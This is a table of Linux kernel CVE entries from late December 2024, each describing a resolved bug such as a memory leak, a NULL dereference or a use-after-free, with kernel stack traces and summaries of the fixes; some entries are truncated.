In the Linux kernel, the following vulnerability has been resolved: ALSA: caiaq: Use snd_card_free_when_closed() at disconnection The USB disconnect callback is supposed to be short and not too-long waiting. OTOH, the current code uses snd_card_free() at disconnection, but this waits for the close of all used fds, hence it can take long. It eventually blocks the upper layer USB ioctls, which may trigger a soft lockup. An easy workaround is to replace snd_card_free() with snd_card_free_when_closed(). This variant returns immediately while the release of resources is done asynchronously by the card device release at the last close. This patch also splits the code to the disconnect and the free phases; the former is called immediately at the USB disconnect callback while the latter is called from the card destructor. | 2024-12-27 | not yet calculated | CVE-2024-56531 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ALSA: us122l: Use snd_card_free_when_closed() at disconnection The USB disconnect callback is supposed to be short and not too-long waiting. OTOH, the current code uses snd_card_free() at disconnection, but this waits for the close of all used fds, hence it can take long. It eventually blocks the upper layer USB ioctls, which may trigger a soft lockup. An easy workaround is to replace snd_card_free() with snd_card_free_when_closed(). This variant returns immediately while the release of resources is done asynchronously by the card device release at the last close. The loop of us122l->mmap_count check is dropped as well. The check is useless for the asynchronous operation with *_when_closed(). | 2024-12-27 | not yet calculated | CVE-2024-56532 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ALSA: usx2y: Use snd_card_free_when_closed() at disconnection The USB disconnect callback is supposed to be short and not too-long waiting. OTOH, the current code uses snd_card_free() at disconnection, but this waits for the close of all used fds, hence it can take long. It eventually blocks the upper layer USB ioctls, which may trigger a soft lockup. An easy workaround is to replace snd_card_free() with snd_card_free_when_closed(). This variant returns immediately while the release of resources is done asynchronously by the card device release at the last close. | 2024-12-27 | not yet calculated | CVE-2024-56533 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: isofs: avoid memory leak in iocharset A memleak was found as below: unreferenced object 0xffff0000d10164d8 (size 8): comm "pool-udisksd", pid 108217, jiffies 4295408555 hex dump (first 8 bytes): 75 74 66 38 00 cc cc cc utf8.... backtrace (crc de430d31): [<ffff800081046e6c>] kmemleak_alloc+0xb8/0xc8 [<ffff8000803e6c3c>] __kmalloc_node_track_caller_noprof+0x380/0x474 [<ffff800080363b74>] kstrdup+0x70/0xfc [<ffff80007bb3c6a4>] isofs_parse_param+0x228/0x2c0 [isofs] [<ffff8000804d7f68>] vfs_parse_fs_param+0xf4/0x164 [<ffff8000804d8064>] vfs_parse_fs_string+0x8c/0xd4 [<ffff8000804d815c>] vfs_parse_monolithic_sep+0xb0/0xfc [<ffff8000804d81d8>] generic_parse_monolithic+0x30/0x3c [<ffff8000804d8bfc>] parse_monolithic_mount_data+0x40/0x4c [<ffff8000804b6a64>] path_mount+0x6c4/0x9ec [<ffff8000804b6e38>] do_mount+0xac/0xc4 [<ffff8000804b7494>] __arm64_sys_mount+0x16c/0x2b0 [<ffff80008002b8dc>] invoke_syscall+0x7c/0x104 [<ffff80008002ba44>] el0_svc_common.constprop.1+0xe0/0x104 [<ffff80008002ba94>] do_el0_svc+0x2c/0x38 [<ffff800081041108>] el0_svc+0x3c/0x1b8 The opt->iocharset is freed inside the isofs_fill_super function, But there may be situations where it's not possible to enter this function. For example, in the get_tree_bdev_flags function,when encountering the situation where "Can't mount, would change RO state," In such a case, isofs_fill_super will not have the opportunity to be called,which means that opt->iocharset will not have the chance to be freed,ultimately leading to a memory leak. Let's move the memory freeing of opt->iocharset into isofs_free_fc function. | 2024-12-27 | not yet calculated | CVE-2024-56534 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: wifi: rtw89: coex: check NULL return of kmalloc in btc_fw_set_monreg() kmalloc may fail, return value might be NULL and will cause NULL pointer dereference. Add check NULL return of kmalloc in btc_fw_set_monreg(). | 2024-12-27 | not yet calculated | CVE-2024-56535 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: wifi: cw1200: Fix potential NULL dereference A recent refactoring was identified by static analysis to cause a potential NULL dereference, fix this! | 2024-12-27 | not yet calculated | CVE-2024-56536 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: drm: xlnx: zynqmp_disp: layer may be null while releasing layer->info can be null if we have an error on the first layer in zynqmp_disp_create_layers | 2024-12-27 | not yet calculated | CVE-2024-56537 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: drm: zynqmp_kms: Unplug DRM device before removal Prevent userspace accesses to the DRM device from causing use-after-frees by unplugging the device before we remove it. This causes any further userspace accesses to result in an error without further calls into this driver's internals. | 2024-12-27 | not yet calculated | CVE-2024-56538 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: wifi: mwifiex: Fix memcpy() field-spanning write warning in mwifiex_config_scan() Replace one-element array with a flexible-array member in `struct mwifiex_ie_types_wildcard_ssid_params` to fix the following warning on a MT8173 Chromebook (mt8173-elm-hana): [ 356.775250] ------------[ cut here ]------------ [ 356.784543] memcpy: detected field-spanning write (size 6) of single field "wildcard_ssid_tlv->ssid" at drivers/net/wireless/marvell/mwifiex/scan.c:904 (size 1) [ 356.813403] WARNING: CPU: 3 PID: 742 at drivers/net/wireless/marvell/mwifiex/scan.c:904 mwifiex_scan_networks+0x4fc/0xf28 [mwifiex] The "(size 6)" above is exactly the length of the SSID of the network this device was connected to. The source of the warning looks like: ssid_len = user_scan_in->ssid_list[i].ssid_len; [...] memcpy(wildcard_ssid_tlv->ssid, user_scan_in->ssid_list[i].ssid, ssid_len); There is a #define WILDCARD_SSID_TLV_MAX_SIZE that uses sizeof() on this struct, but it already didn't account for the size of the one-element array, so it doesn't need to be changed. | 2024-12-27 | not yet calculated | CVE-2024-56539 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: accel/ivpu: Prevent recovery invocation during probe and resume Refactor IPC send and receive functions to allow correct handling of operations that should not trigger a recovery process. Expose ivpu_send_receive_internal(), which is now utilized by the D0i3 entry, DCT initialization, and HWS initialization functions. These functions have been modified to return error codes gracefully, rather than initiating recovery. The updated functions are invoked within ivpu_probe() and ivpu_resume(), ensuring that any errors encountered during these stages result in a proper teardown or shutdown sequence. The previous approach of triggering recovery within these functions could lead to a race condition, potentially causing undefined behavior and kernel crashes due to null pointer dereferences. | 2024-12-27 | not yet calculated | CVE-2024-56540 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: wifi: ath12k: fix use-after-free in ath12k_dp_cc_cleanup() During ath12k module removal, in ath12k_core_deinit(), ath12k_mac_destroy() un-registers ah->hw from mac80211 and frees the ah->hw as well as all the ar's in it. After this ath12k_core_soc_destroy()-> ath12k_dp_free()-> ath12k_dp_cc_cleanup() tries to access one of the freed ar's from pending skb. This is because during mac destroy, driver failed to flush few data packets, which were accessed later in ath12k_dp_cc_cleanup() and freed, but using ar from the packet led to this use-after-free. BUG: KASAN: use-after-free in ath12k_dp_cc_cleanup.part.0+0x5e2/0xd40 [ath12k] Write of size 4 at addr ffff888150bd3514 by task modprobe/8926 CPU: 0 UID: 0 PID: 8926 Comm: modprobe Not tainted 6.11.0-rc2-wt-ath+ #1746 Hardware name: Intel(R) Client Systems NUC8i7HVK/NUC8i7HVB, BIOS HNKBLi70.86A.0067.2021.0528.1339 05/28/2021 Call Trace: <TASK> dump_stack_lvl+0x7d/0xe0 print_address_description.constprop.0+0x33/0x3a0 print_report+0xb5/0x260 ? kasan_addr_to_slab+0x24/0x80 kasan_report+0xd8/0x110 ? ath12k_dp_cc_cleanup.part.0+0x5e2/0xd40 [ath12k] ? ath12k_dp_cc_cleanup.part.0+0x5e2/0xd40 [ath12k] kasan_check_range+0xf3/0x1a0 __kasan_check_write+0x14/0x20 ath12k_dp_cc_cleanup.part.0+0x5e2/0xd40 [ath12k] ath12k_dp_free+0x178/0x420 [ath12k] ath12k_core_stop+0x176/0x200 [ath12k] ath12k_core_deinit+0x13f/0x210 [ath12k] ath12k_pci_remove+0xad/0x1c0 [ath12k] pci_device_remove+0x9b/0x1b0 device_remove+0xbf/0x150 device_release_driver_internal+0x3c3/0x580 ? __kasan_check_read+0x11/0x20 driver_detach+0xc4/0x190 bus_remove_driver+0x130/0x2a0 driver_unregister+0x68/0x90 pci_unregister_driver+0x24/0x240 ? find_module_all+0x13e/0x1e0 ath12k_pci_exit+0x10/0x20 [ath12k] __do_sys_delete_module+0x32c/0x580 ? module_flags+0x2f0/0x2f0 ? kmem_cache_free+0xf0/0x410 ? __fput+0x56f/0xab0 ? __fput+0x56f/0xab0 ? debug_smp_processor_id+0x17/0x20 __x64_sys_delete_module+0x4f/0x70 x64_sys_call+0x522/0x9f0 do_syscall_64+0x64/0x130 entry_SYSCALL_64_after_hwframe+0x4b/0x53 RIP: 0033:0x7f8182c6ac8b Commit 24de1b7b231c ("wifi: ath12k: fix flush failure in recovery scenarios") added the change to decrement the pending packets count in case of recovery which make sense as ah->hw as well all ar's in it are intact during recovery, but during core deinit there is no use in decrementing packets count or waking up the empty waitq as the module is going to be removed also ar's from pending skb's can't be used and the packets should just be released back. To fix this, avoid accessing ar from skb->cb when driver is being unregistered. Tested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.1.1-00214-QCAHKSWPL_SILICONZ-1 Tested-on: WCN7850 hw2.0 PCI WLAN.HMT.1.0.c5-00481-QCAHMTSWPL_V1.0_V2.0_SILICONZ-3 | 2024-12-27 | not yet calculated | CVE-2024-56541 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: fix a memleak issue when driver is removed Running "modprobe amdgpu" the second time (followed by a modprobe -r amdgpu) causes a call trace like: [ 845.212163] Memory manager not clean during takedown. [ 845.212170] WARNING: CPU: 4 PID: 2481 at drivers/gpu/drm/drm_mm.c:999 drm_mm_takedown+0x2b/0x40 [ 845.212177] Modules linked in: amdgpu(OE-) amddrm_ttm_helper(OE) amddrm_buddy(OE) amdxcp(OE) amd_sched(OE) drm_exec drm_suballoc_helper drm_display_helper i2c_algo_bit amdttm(OE) amdkcl(OE) cec rc_core sunrpc qrtr intel_rapl_msr intel_rapl_common snd_hda_codec_hdmi edac_mce_amd snd_hda_intel snd_intel_dspcfg snd_intel_sdw_acpi snd_usb_audio snd_hda_codec snd_usbmidi_lib kvm_amd snd_hda_core snd_ump mc snd_hwdep kvm snd_pcm snd_seq_midi snd_seq_midi_event irqbypass crct10dif_pclmul snd_rawmidi polyval_clmulni polyval_generic ghash_clmulni_intel sha256_ssse3 sha1_ssse3 snd_seq aesni_intel crypto_simd snd_seq_device cryptd snd_timer mfd_aaeon asus_nb_wmi eeepc_wmi joydev asus_wmi snd ledtrig_audio sparse_keymap ccp wmi_bmof input_leds k10temp i2c_piix4 platform_profile rapl soundcore gpio_amdpt mac_hid binfmt_misc msr parport_pc ppdev lp parport efi_pstore nfnetlink dmi_sysfs ip_tables x_tables autofs4 hid_logitech_hidpp hid_logitech_dj hid_generic usbhid hid ahci xhci_pci igc crc32_pclmul libahci xhci_pci_renesas video [ 845.212284] wmi [last unloaded: amddrm_ttm_helper(OE)] [ 845.212290] CPU: 4 PID: 2481 Comm: modprobe Tainted: G W OE 6.8.0-31-generic #31-Ubuntu [ 845.212296] RIP: 0010:drm_mm_takedown+0x2b/0x40 [ 845.212300] Code: 1f 44 00 00 48 8b 47 38 48 83 c7 38 48 39 f8 75 09 31 c0 31 ff e9 90 2e 86 00 55 48 c7 c7 d0 f6 8e 8a 48 89 e5 e8 f5 db 45 ff <0f> 0b 5d 31 c0 31 ff e9 74 2e 86 00 66 0f 1f 84 00 00 00 00 00 90 [ 845.212302] RSP: 0018:ffffb11302127ae0 EFLAGS: 00010246 [ 845.212305] RAX: 0000000000000000 RBX: ffff92aa5020fc08 RCX: 0000000000000000 [ 845.212307] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000 [ 845.212309] RBP: ffffb11302127ae0 R08: 0000000000000000 R09: 0000000000000000 [ 845.212310] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000004 [ 845.212312] R13: ffff92aa50200000 R14: ffff92aa5020fb10 R15: ffff92aa5020faa0 [ 845.212313] FS: 0000707dd7c7c080(0000) GS:ffff92b93de00000(0000) knlGS:0000000000000000 [ 845.212316] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 845.212318] CR2: 00007d48b0aee200 CR3: 0000000115a58000 CR4: 0000000000f50ef0 [ 845.212320] PKRU: 55555554 [ 845.212321] Call Trace: [ 845.212323] <TASK> [ 845.212328] ? show_regs+0x6d/0x80 [ 845.212333] ? __warn+0x89/0x160 [ 845.212339] ? drm_mm_takedown+0x2b/0x40 [ 845.212344] ? report_bug+0x17e/0x1b0 [ 845.212350] ? handle_bug+0x51/0xa0 [ 845.212355] ? exc_invalid_op+0x18/0x80 [ 845.212359] ? asm_exc_invalid_op+0x1b/0x20 [ 845.212366] ? drm_mm_takedown+0x2b/0x40 [ 845.212371] amdgpu_gtt_mgr_fini+0xa9/0x130 [amdgpu] [ 845.212645] amdgpu_ttm_fini+0x264/0x340 [amdgpu] [ 845.212770] amdgpu_bo_fini+0x2e/0xc0 [amdgpu] [ 845.212894] gmc_v12_0_sw_fini+0x2a/0x40 [amdgpu] [ 845.213036] amdgpu_device_fini_sw+0x11a/0x590 [amdgpu] [ 845.213159] amdgpu_driver_release_kms+0x16/0x40 [amdgpu] [ 845.213302] devm_drm_dev_init_release+0x5e/0x90 [ 845.213305] devm_action_release+0x12/0x30 [ 845.213308] release_nodes+0x42/0xd0 [ 845.213311] devres_release_all+0x97/0xe0 [ 845.213314] device_unbind_cleanup+0x12/0x80 [ 845.213317] device_release_driver_internal+0x230/0x270 [ 845.213319] ? srso_alias_return_thunk+0x5/0xfbef5 This is caused by lost memory during early init phase. First time driver is removed, memory is freed but when second time the driver is inserted, VBIOS dmub is not active, since the PSP policy is to retain the driver loaded version on subsequent warm boots. Hence, communication with VBIOS DMUB fails. Fix this by aborting further comm ---truncated--- | 2024-12-27 | not yet calculated | CVE-2024-56542 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: wifi: ath12k: Skip Rx TID cleanup for self peer During peer create, dp setup for the peer is done where Rx TID is updated for all the TIDs. Peer object for self peer will not go through dp setup. When core halts, dp cleanup is done for all the peers. While cleanup, rx_tid::ab is accessed which causes below stack trace for self peer. WARNING: CPU: 6 PID: 12297 at drivers/net/wireless/ath/ath12k/dp_rx.c:851 Call Trace: __warn+0x7b/0x1a0 ath12k_dp_rx_frags_cleanup+0xd2/0xe0 [ath12k] report_bug+0x10b/0x200 handle_bug+0x3f/0x70 exc_invalid_op+0x13/0x60 asm_exc_invalid_op+0x16/0x20 ath12k_dp_rx_frags_cleanup+0xd2/0xe0 [ath12k] ath12k_dp_rx_frags_cleanup+0xca/0xe0 [ath12k] ath12k_dp_rx_peer_tid_cleanup+0x39/0xa0 [ath12k] ath12k_mac_peer_cleanup_all+0x61/0x100 [ath12k] ath12k_core_halt+0x3b/0x100 [ath12k] ath12k_core_reset+0x494/0x4c0 [ath12k] sta object in peer will be updated when remote peer is created. Hence use peer::sta to detect the self peer and skip the cleanup. Tested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.0.1-00029-QCAHKSWPL_SILICONZ-1 Tested-on: WCN7850 hw2.0 PCI WLAN.HMT.1.0.c5-00481-QCAHMTSWPL_V1.0_V2.0_SILICONZ-3 | 2024-12-27 | not yet calculated | CVE-2024-56543 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: udmabuf: change folios array from kmalloc to kvmalloc When PAGE_SIZE 4096, MAX_PAGE_ORDER 10, 64bit machine, page_alloc only support 4MB. If above this, trigger this warn and return NULL. udmabuf can change size limit, if change it to 3072(3GB), and then alloc 3GB udmabuf, will fail create. [ 4080.876581] ------------[ cut here ]------------ [ 4080.876843] WARNING: CPU: 3 PID: 2015 at mm/page_alloc.c:4556 __alloc_pages+0x2c8/0x350 [ 4080.878839] RIP: 0010:__alloc_pages+0x2c8/0x350 [ 4080.879470] Call Trace: [ 4080.879473] <TASK> [ 4080.879473] ? __alloc_pages+0x2c8/0x350 [ 4080.879475] ? __warn.cold+0x8e/0xe8 [ 4080.880647] ? __alloc_pages+0x2c8/0x350 [ 4080.880909] ? report_bug+0xff/0x140 [ 4080.881175] ? handle_bug+0x3c/0x80 [ 4080.881556] ? exc_invalid_op+0x17/0x70 [ 4080.881559] ? asm_exc_invalid_op+0x1a/0x20 [ 4080.882077] ? udmabuf_create+0x131/0x400 Because MAX_PAGE_ORDER, kmalloc can max alloc 4096 * (1 << 10), 4MB memory, each array entry is pointer(8byte), so can save 524288 pages(2GB). Further more, costly order(order 3) may not be guaranteed that it can be applied for, due to fragmentation. This patch change udmabuf array use kvmalloc_array, this can fallback alloc into vmalloc, which can guarantee allocation for any size and does not affect the performance of kmalloc allocations. | 2024-12-27 | not yet calculated | CVE-2024-56544 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: HID: hyperv: streamline driver probe to avoid devres issues It was found that unloading 'hid_hyperv' module results in a devres complaint: ... hv_vmbus: unregistering driver hid_hyperv ------------[ cut here ]------------ WARNING: CPU: 2 PID: 3983 at drivers/base/devres.c:691 devres_release_group+0x1f2/0x2c0 ... Call Trace: <TASK> ? devres_release_group+0x1f2/0x2c0 ? __warn+0xd1/0x1c0 ? devres_release_group+0x1f2/0x2c0 ? report_bug+0x32a/0x3c0 ? handle_bug+0x53/0xa0 ? exc_invalid_op+0x18/0x50 ? asm_exc_invalid_op+0x1a/0x20 ? devres_release_group+0x1f2/0x2c0 ? devres_release_group+0x90/0x2c0 ? rcu_is_watching+0x15/0xb0 ? __pfx_devres_release_group+0x10/0x10 hid_device_remove+0xf5/0x220 device_release_driver_internal+0x371/0x540 ? klist_put+0xf3/0x170 bus_remove_device+0x1f1/0x3f0 device_del+0x33f/0x8c0 ? __pfx_device_del+0x10/0x10 ? cleanup_srcu_struct+0x337/0x500 hid_destroy_device+0xc8/0x130 mousevsc_remove+0xd2/0x1d0 [hid_hyperv] device_release_driver_internal+0x371/0x540 driver_detach+0xc5/0x180 bus_remove_driver+0x11e/0x2a0 ? __mutex_unlock_slowpath+0x160/0x5e0 vmbus_driver_unregister+0x62/0x2b0 [hv_vmbus] ... And the issue seems to be that the corresponding devres group is not allocated. Normally, devres_open_group() is called from __hid_device_probe() but Hyper-V HID driver overrides 'hid_dev->driver' with 'mousevsc_hid_driver' stub and basically re-implements __hid_device_probe() by calling hid_parse() and hid_hw_start() but not devres_open_group(). hid_device_probe() does not call __hid_device_probe() for it. Later, when the driver is removed, hid_device_remove() calls devres_release_group() as it doesn't check whether hdev->driver was initially overridden or not. The issue seems to be related to the commit 62c68e7cee33 ("HID: ensure timely release of driver-allocated resources") but the commit itself seems to be correct. Fix the issue by dropping the 'hid_dev->driver' override and using hid_register_driver()/hid_unregister_driver() instead. Alternatively, it would have been possible to rely on the default handling but HID_CONNECT_DEFAULT implies HID_CONNECT_HIDRAW and it doesn't seem to work for mousevsc as-is. | 2024-12-27 | not yet calculated | CVE-2024-56545 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: drivers: soc: xilinx: add the missing kfree in xlnx_add_cb_for_suspend() If we fail to allocate memory for cb_data by kmalloc, the memory allocation for eve_data is never freed, add the missing kfree() in the error handling path. | 2024-12-27 | not yet calculated | CVE-2024-56546 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: rcu/nocb: Fix missed RCU barrier on deoffloading Currently, running rcutorture test with torture_type=rcu fwd_progress=8 n_barrier_cbs=8 nocbs_nthreads=8 nocbs_toggle=100 onoff_interval=60 test_boost=2, will trigger the following warning: WARNING: CPU: 19 PID: 100 at kernel/rcu/tree_nocb.h:1061 rcu_nocb_rdp_deoffload+0x292/0x2a0 RIP: 0010:rcu_nocb_rdp_deoffload+0x292/0x2a0 Call Trace: <TASK> ? __warn+0x7e/0x120 ? rcu_nocb_rdp_deoffload+0x292/0x2a0 ? report_bug+0x18e/0x1a0 ? handle_bug+0x3d/0x70 ? exc_invalid_op+0x18/0x70 ? asm_exc_invalid_op+0x1a/0x20 ? rcu_nocb_rdp_deoffload+0x292/0x2a0 rcu_nocb_cpu_deoffload+0x70/0xa0 rcu_nocb_toggle+0x136/0x1c0 ? __pfx_rcu_nocb_toggle+0x10/0x10 kthread+0xd1/0x100 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x2f/0x50 ? __pfx_kthread+0x10/0x10 ret_from_fork_asm+0x1a/0x30 </TASK> CPU0 CPU2 CPU3 //rcu_nocb_toggle //nocb_cb_wait //rcutorture // deoffload CPU1 // process CPU1's rdp rcu_barrier() rcu_segcblist_entrain() rcu_segcblist_add_len(1); // len == 2 // enqueue barrier // callback to CPU1's // rdp->cblist rcu_do_batch() // invoke CPU1's rdp->cblist // callback rcu_barrier_callback() rcu_barrier() mutex_lock(&rcu_state.barrier_mutex); // still see len == 2 // enqueue barrier callback // to CPU1's rdp->cblist rcu_segcblist_entrain() rcu_segcblist_add_len(1); // len == 3 // decrement len rcu_segcblist_add_len(-2); kthread_parkme() // CPU1's rdp->cblist len == 1 // Warn because there is // still a pending barrier // trigger warning WARN_ON_ONCE(rcu_segcblist_n_cbs(&rdp->cblist)); cpus_read_unlock(); // wait CPU1 to comes online and // invoke barrier callback on // CPU1 rdp's->cblist wait_for_completion(&rcu_state.barrier_completion); // deoffload CPU4 cpus_read_lock() rcu_barrier() mutex_lock(&rcu_state.barrier_mutex); // block on barrier_mutex // wait rcu_barrier() on // CPU3 to unlock barrier_mutex // but CPU3 unlock barrier_mutex // need to wait CPU1 comes online // when CPU1 going online will block on cpus_write_lock The above scenario will not only trigger a WARN_ON_ONCE(), but also trigger a deadlock. Thanks to nocb locking, a second racing rcu_barrier() on an offline CPU will either observe the decremented callback counter down to 0 and spare the callback enqueue, or rcuo will observe the new callback and keep rdp->nocb_cb_sleep to false. Therefore check rdp->nocb_cb_sleep before parking to make sure no further rcu_barrier() is waiting on the rdp. | 2024-12-27 | not yet calculated | CVE-2024-56547 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: hfsplus: don't query the device logical block size multiple times Devices block sizes may change. One of these cases is a loop device by using ioctl LOOP_SET_BLOCK_SIZE. While this may cause other issues like IO being rejected, in the case of hfsplus, it will allocate a block by using that size and potentially write out-of-bounds when hfsplus_read_wrapper calls hfsplus_submit_bio and the latter function reads a different io_size. Using a new min_io_size initally set to sb_min_blocksize works for the purposes of the original fix, since it will be set to the max between HFSPLUS_SECTOR_SIZE and the first seen logical block size. We still use the max between HFSPLUS_SECTOR_SIZE and min_io_size in case the latter is not initialized. Tested by mounting an hfsplus filesystem with loop block sizes 512, 1024 and 4096. The produced KASAN report before the fix looks like this: [ 419.944641] ================================================================== [ 419.945655] BUG: KASAN: slab-use-after-free in hfsplus_read_wrapper+0x659/0xa0a [ 419.946703] Read of size 2 at addr ffff88800721fc00 by task repro/10678 [ 419.947612] [ 419.947846] CPU: 0 UID: 0 PID: 10678 Comm: repro Not tainted 6.12.0-rc5-00008-gdf56e0f2f3ca #84 [ 419.949007] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.15.0-1 04/01/2014 [ 419.950035] Call Trace: [ 419.950384] <TASK> [ 419.950676] dump_stack_lvl+0x57/0x78 [ 419.951212] ? hfsplus_read_wrapper+0x659/0xa0a [ 419.951830] print_report+0x14c/0x49e [ 419.952361] ? __virt_addr_valid+0x267/0x278 [ 419.952979] ? kmem_cache_debug_flags+0xc/0x1d [ 419.953561] ? hfsplus_read_wrapper+0x659/0xa0a [ 419.954231] kasan_report+0x89/0xb0 [ 419.954748] ? hfsplus_read_wrapper+0x659/0xa0a [ 419.955367] hfsplus_read_wrapper+0x659/0xa0a [ 419.955948] ? __pfx_hfsplus_read_wrapper+0x10/0x10 [ 419.956618] ? do_raw_spin_unlock+0x59/0x1a9 [ 419.957214] ? _raw_spin_unlock+0x1a/0x2e [ 419.957772] hfsplus_fill_super+0x348/0x1590 [ 419.958355] ? hlock_class+0x4c/0x109 [ 419.958867] ? __pfx_hfsplus_fill_super+0x10/0x10 [ 419.959499] ? __pfx_string+0x10/0x10 [ 419.960006] ? lock_acquire+0x3e2/0x454 [ 419.960532] ? bdev_name.constprop.0+0xce/0x243 [ 419.961129] ? __pfx_bdev_name.constprop.0+0x10/0x10 [ 419.961799] ? pointer+0x3f0/0x62f [ 419.962277] ? __pfx_pointer+0x10/0x10 [ 419.962761] ? vsnprintf+0x6c4/0xfba [ 419.963178] ? __pfx_vsnprintf+0x10/0x10 [ 419.963621] ? setup_bdev_super+0x376/0x3b3 [ 419.964029] ? snprintf+0x9d/0xd2 [ 419.964344] ? __pfx_snprintf+0x10/0x10 [ 419.964675] ? lock_acquired+0x45c/0x5e9 [ 419.965016] ? set_blocksize+0x139/0x1c1 [ 419.965381] ? sb_set_blocksize+0x6d/0xae [ 419.965742] ? __pfx_hfsplus_fill_super+0x10/0x10 [ 419.966179] mount_bdev+0x12f/0x1bf [ 419.966512] ? __pfx_mount_bdev+0x10/0x10 [ 419.966886] ? vfs_parse_fs_string+0xce/0x111 [ 419.967293] ? __pfx_vfs_parse_fs_string+0x10/0x10 [ 419.967702] ? __pfx_hfsplus_mount+0x10/0x10 [ 419.968073] legacy_get_tree+0x104/0x178 [ 419.968414] vfs_get_tree+0x86/0x296 [ 419.968751] path_mount+0xba3/0xd0b [ 419.969157] ? __pfx_path_mount+0x10/0x10 [ 419.969594] ? kmem_cache_free+0x1e2/0x260 [ 419.970311] do_mount+0x99/0xe0 [ 419.970630] ? __pfx_do_mount+0x10/0x10 [ 419.971008] __do_sys_mount+0x199/0x1c9 [ 419.971397] do_syscall_64+0xd0/0x135 [ 419.971761] entry_SYSCALL_64_after_hwframe+0x76/0x7e [ 419.972233] RIP: 0033:0x7c3cb812972e [ 419.972564] Code: 48 8b 0d f5 46 0d 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 49 89 ca b8 a5 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d c2 46 0d 00 f7 d8 64 89 01 48 [ 419.974371] RSP: 002b:00007ffe30632548 EFLAGS: 00000286 ORIG_RAX: 00000000000000a5 [ 419.975048] RAX: ffffffffffffffda RBX: 00007ffe306328d8 RCX: 00007c3cb812972e [ 419.975701] RDX: 0000000020000000 RSI: 0000000020000c80 RDI: ---truncated--- | 2024-12-27 | not yet calculated | CVE-2024-56548 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: cachefiles: Fix NULL pointer dereference in object->file At present, the object->file has the NULL pointer dereference problem in ondemand-mode. The root cause is that the allocated fd and object->file lifetime are inconsistent, and the user-space invocation to anon_fd uses object->file. Following is the process that triggers the issue: [write fd] [umount] cachefiles_ondemand_fd_write_iter fscache_cookie_state_machine cachefiles_withdraw_cookie if (!file) return -ENOBUFS cachefiles_clean_up_object cachefiles_unmark_inode_in_use fput(object->file) object->file = NULL // file NULL pointer dereference! __cachefiles_write(..., file, ...) Fix this issue by add an additional reference count to the object->file before write/llseek, and decrement after it finished. | 2024-12-27 | not yet calculated | CVE-2024-56549 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: s390/stacktrace: Use break instead of return statement arch_stack_walk_user_common() contains a return statement instead of a break statement in case store_ip() fails while trying to store a callchain entry of a user space process. This may lead to a missing pagefault_enable() call. If this happens any subsequent page fault of the process won't be resolved by the page fault handler and this in turn will lead to the process being killed. Use a break instead of a return statement to fix this. | 2024-12-27 | not yet calculated | CVE-2024-56550 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: fix usage slab after free [ +0.000021] BUG: KASAN: slab-use-after-free in drm_sched_entity_flush+0x6cb/0x7a0 [gpu_sched] [ +0.000027] Read of size 8 at addr ffff8881b8605f88 by task amd_pci_unplug/2147 [ +0.000023] CPU: 6 PID: 2147 Comm: amd_pci_unplug Not tainted 6.10.0+ #1 [ +0.000016] Hardware name: ASUS System Product Name/ROG STRIX B550-F GAMING (WI-FI), BIOS 1401 12/03/2020 [ +0.000016] Call Trace: [ +0.000008] <TASK> [ +0.000009] dump_stack_lvl+0x76/0xa0 [ +0.000017] print_report+0xce/0x5f0 [ +0.000017] ? drm_sched_entity_flush+0x6cb/0x7a0 [gpu_sched] [ +0.000019] ? srso_return_thunk+0x5/0x5f [ +0.000015] ? kasan_complete_mode_report_info+0x72/0x200 [ +0.000016] ? drm_sched_entity_flush+0x6cb/0x7a0 [gpu_sched] [ +0.000019] kasan_report+0xbe/0x110 [ +0.000015] ? drm_sched_entity_flush+0x6cb/0x7a0 [gpu_sched] [ +0.000023] __asan_report_load8_noabort+0x14/0x30 [ +0.000014] drm_sched_entity_flush+0x6cb/0x7a0 [gpu_sched] [ +0.000020] ? srso_return_thunk+0x5/0x5f [ +0.000013] ? __kasan_check_write+0x14/0x30 [ +0.000016] ? __pfx_drm_sched_entity_flush+0x10/0x10 [gpu_sched] [ +0.000020] ? srso_return_thunk+0x5/0x5f [ +0.000013] ? __kasan_check_write+0x14/0x30 [ +0.000013] ? srso_return_thunk+0x5/0x5f [ +0.000013] ? enable_work+0x124/0x220 [ +0.000015] ? __pfx_enable_work+0x10/0x10 [ +0.000013] ? srso_return_thunk+0x5/0x5f [ +0.000014] ? free_large_kmalloc+0x85/0xf0 [ +0.000016] drm_sched_entity_destroy+0x18/0x30 [gpu_sched] [ +0.000020] amdgpu_vce_sw_fini+0x55/0x170 [amdgpu] [ +0.000735] ? __kasan_check_read+0x11/0x20 [ +0.000016] vce_v4_0_sw_fini+0x80/0x110 [amdgpu] [ +0.000726] amdgpu_device_fini_sw+0x331/0xfc0 [amdgpu] [ +0.000679] ? mutex_unlock+0x80/0xe0 [ +0.000017] ? 